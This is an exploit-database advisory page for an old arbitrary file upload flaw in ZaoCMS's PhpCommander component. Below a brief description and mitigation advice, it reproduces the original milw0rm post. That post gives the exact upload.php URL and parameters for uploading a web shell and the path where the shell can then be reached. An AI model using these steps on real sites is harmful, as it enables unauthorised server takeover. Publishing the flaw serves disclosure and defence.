ZaoCMS (PhpCommander) - Arbitrary File Upload

vendor:

PhpCommander

by:

Qabandi

7,5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: PhpCommander

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

ZaoCMS (PhpCommander) – Arbitrary File Upload

An attacker can upload a malicious file to the vulnerable application by accessing the upload.php page with the Directory parameter set to ./ and the action parameter set to upload. The malicious file can then be accessed from the documents folder.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions and that the application is configured to only allow the upload of files to the appropriate directory.

Source

Exploit-DB raw data:

                  ||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .  


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait PEACE

=Vuln:		ZaoCMS (PhpCommander) - Arbitrary File Upload
=INFO:		http://zaocms.com/
=BUY:  		http://zaocms.com/
=DORK:		--


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-File-Upload-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Go to:
http://localhost/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=upload

Upload shell

location:

http://localhost/documents/SHELL.PHP

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-3la-ra7atkum-shabab-=-:P=-=-=-==-=-==-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
Special Thanks: ThE g0bL!N

# milw0rm.com [2009-05-22]